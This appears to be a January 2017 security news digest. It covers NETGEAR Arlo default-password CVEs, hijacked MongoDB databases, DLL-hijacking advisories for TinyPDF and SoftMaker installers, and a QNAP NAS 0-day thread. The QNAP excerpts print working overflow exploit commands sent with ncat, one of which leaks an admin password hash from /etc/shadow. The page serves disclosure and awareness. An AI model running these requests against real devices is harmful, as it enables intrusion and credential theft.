The results of the latest study from Kaspersky Lab indicate that social media now leaves many people feeling negative
Monthly Archives: January 2017
Kaspersky Lab Finds Businesses are Unclear on How to Combat Targeted Attacks and DDoS
Nearly four-in-ten businesses admit they are unclear on the most effective protection strategy to combat these types of attacks.
CVE-2016-10115
NETGEAR Arlo base stations with firmware 1.7.5_6178 and earlier, Arlo Q devices with firmware 1.8.0_5551 and earlier, and Arlo Q Plus devices with firmware 1.8.1_6094 and earlier have a default password of 12345678, which makes it easier for remote attackers to obtain access after a factory reset or in a factory configuration.
CVE-2016-10116
NETGEAR Arlo base stations with firmware 1.7.5_6178 and earlier, Arlo Q devices with firmware 1.8.0_5551 and earlier, and Arlo Q Plus devices with firmware 1.8.1_6094 and earlier use a pattern of adjective, noun, and three-digit number for the customized password, which makes it easier for remote attackers to obtain access via a dictionary attack.
Someone Hijacking Unsecured MongoDB Databases for Ransom
Nearly two years back, we warned users about publicly accessible MongoDB instances – almost 600 Terabytes (TB) – over the Internet which require no authentication, potentially leaving websites and servers at risk of hacking.
These MongoDB instances weren’t exposed due to any flaw in its software, but due to a misconfiguration (bad security practice) that let any remote attacker access MongoDB
TinyPDF Installer DLL Hijacking / Unsafe Temp Directory
InstallTinyPDF.exe suffers from dll hijacking and unsafe temp directory vulnerabilities.
Executable installers are vulnerable^WEVIL (case 43): SoftMaker's Office service pack installers allow escalation of privilege
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory “%TEMP%7zSxxxxxxxx” to extract
its payload, then executes “%TEMP%7zSxxxxxxxxspsetup.exe”.
“%TEMP%7zSxxxxxxxx” inherits the NTFS access rights…
Executable installers are vulnerable^WEVIL (case 45): ReadPDF's installers allow escalation of privilege
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the executable installer “InstallTinyPDF.exe”, available from
<http://tinypdf.com/downloads.html>, is (surprise.-) vulnerable:
1. DLL hijacking (this is well-known and well-documented; see
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://capec.mitre.org/data/definitions/471.html>,
<…
Re: 0-day: QNAP NAS Devices suffer of heap overflow
Posted by bashis on Jan 03
And also;
==================
[Stack overflow]
==================
[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en “QUFB”;done“echo -en
“QUJCQkI=”` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Mon, 02 Jan 2017 11:59:24 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[Remote Host]#
====
[Local Host]# dmesg | grep…
Re: 0-day: QNAP NAS Devices suffer of heap overflow
Posted by bashis on Jan 03
Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)
[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en “B”;done | base64 -w 0 ;
echo -en “Dx56xcex06x08″ | base64 -w 0` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***…